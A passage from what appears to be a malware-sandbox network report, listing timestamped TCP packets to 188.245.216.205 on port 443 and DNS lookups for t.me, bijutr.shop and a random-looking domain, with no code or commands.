                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:33.434865952 CET44349849188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171081066 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171149969 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171222925 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171525955 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.171542883 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.188317060 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.188399076 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.190776110 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.190783024 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.192570925 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.192575932 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.192620039 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:34.192626953 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.237127066 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.237215996 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.237221003 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.237267971 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.238149881 CET49853443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.238167048 CET44349853188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.617619038 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.617698908 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.618155956 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.618163109 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.619929075 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.619935036 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.620001078 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:35.620013952 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197264910 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197324991 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197412014 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197640896 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.197669983 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.746493101 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.746563911 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.746575117 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.746737957 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.747461081 CET49859443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:36.747476101 CET44349859188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206345081 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206391096 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206495047 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206712961 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.206726074 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.645689011 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.645761013 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.646234035 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.646266937 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.648186922 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.648200035 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.648262978 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:37.648302078 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.677073002 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.677160978 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.677642107 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.677648067 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.679421902 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.679426908 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.679441929 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.679452896 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.775490999 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.775551081 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.775568962 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.775613070 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.776560068 CET49865443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:38.776575089 CET44349865188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.228472948 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.228513956 CET44349872188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.228573084 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.228785038 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.228804111 CET44349872188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.726949930 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.727014065 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.727118969 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.728051901 CET49866443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:39.728079081 CET44349866188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.235043049 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.235069036 CET44349877188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.235132933 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.235358000 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.235373974 CET44349877188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.690854073 CET44349872188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.690948009 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.691386938 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.691397905 CET44349872188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.693229914 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.693238020 CET44349872188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.693298101 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:40.693306923 CET44349872188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.682244062 CET44349877188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.682311058 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.682673931 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.682679892 CET44349877188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.684357882 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.684365034 CET44349877188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.684406996 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.684420109 CET44349877188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.862121105 CET44349872188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.862200975 CET44349872188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.862204075 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.862267971 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.863045931 CET49872443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:41.863058090 CET44349872188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.275084019 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.275100946 CET44349882188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.275156021 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.275396109 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.275408030 CET44349882188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.844387054 CET44349877188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.844461918 CET44349877188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.844481945 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.844512939 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.845338106 CET49877443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:42.845354080 CET44349877188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.283829927 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.283869982 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.283951044 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.284171104 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.284185886 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.841268063 CET44349882188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.841346979 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.841662884 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.841670990 CET44349882188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.843342066 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.843349934 CET44349882188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.843368053 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:43.843377113 CET44349882188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.804037094 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.804138899 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.804589033 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.804596901 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.806759119 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.806765079 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.806790113 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.806802988 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.931917906 CET44349882188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.931993961 CET44349882188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.932010889 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.932035923 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.932898998 CET49882443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:44.932919025 CET44349882188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.400135040 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.400168896 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.400249958 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.400538921 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.400552034 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.851339102 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.851399899 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.851411104 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.851425886 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.851454020 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.851473093 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.852349997 CET49885443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:45.852358103 CET44349885188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.454608917 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.454642057 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.454719067 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.454926014 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.454936981 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.895920038 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.896033049 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.896409988 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.896416903 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.898216963 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.898216963 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.898225069 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:46.898243904 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.950534105 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.950593948 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.950634956 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.950694084 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.950695992 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.950746059 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.951066017 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.951072931 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.951569080 CET49891443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.951586962 CET44349891188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.952894926 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.952899933 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.952940941 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:47.952945948 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.509907961 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.509965897 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.510039091 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.510220051 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:48.510243893 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056410074 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056468964 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056478977 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056492090 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056515932 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.056535959 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.057401896 CET49892443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:49.057416916 CET44349892188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.103027105 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.103108883 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.103687048 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.103691101 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.105478048 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.105482101 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.994230986 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.994303942 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.994410992 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.995235920 CET49898443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:50.995245934 CET44349898188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.635507107 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.635528088 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.635598898 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.646568060 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:51.646580935 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.135283947 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.135416985 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.135879993 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.135890007 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.137491941 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:53.137496948 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040405035 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040463924 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040710926 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040807009 CET49909443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.040822983 CET44349909188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042090893 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042144060 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042215109 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042594910 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:54.042617083 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.489475965 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.489556074 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.490003109 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.490017891 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.491642952 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:55.491657019 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.554795980 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.554872990 CET44349915188.245.216.205192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.554944038 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.555216074 CET49915443192.168.2.4188.245.216.205
                                                                                                                                                                                                                                                              Dec 27, 2024 07:10:56.555229902 CET44349915188.245.216.205192.168.2.4

                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:10.876012087 CET6362853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:11.094137907 CET53636281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:18.713890076 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:25.600939989 CET4941853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:25.738939047 CET53494181.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.704071999 CET4985353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.843633890 CET53498531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.408648014 CET53626151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.450326920 CET53525271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.611745119 CET6038553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.612502098 CET6419753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.748589039 CET53603851.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.749243021 CET53641971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:47.289989948 CET53546271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:48.708857059 CET53642411.1.1.1192.168.2.4

                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:10.876012087 CET192.168.2.41.1.1.10x8df2Standard query (0)pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:25.600939989 CET192.168.2.41.1.1.10xcd36Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:27.704071999 CET192.168.2.41.1.1.10x971Standard query (0)bijutr.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.611745119 CET192.168.2.41.1.1.10x8c84Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:44.612502098 CET192.168.2.41.1.1.10xcaa9Standard query (0)www.google.com65IN (0x0001)false

                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:11.094137907 CET1.1.1.1192.168.2.40x8df2Name error (3)pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 27, 2024 07:09:25.738939047 CET1.1.1.1192.168.2.40xcd36No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
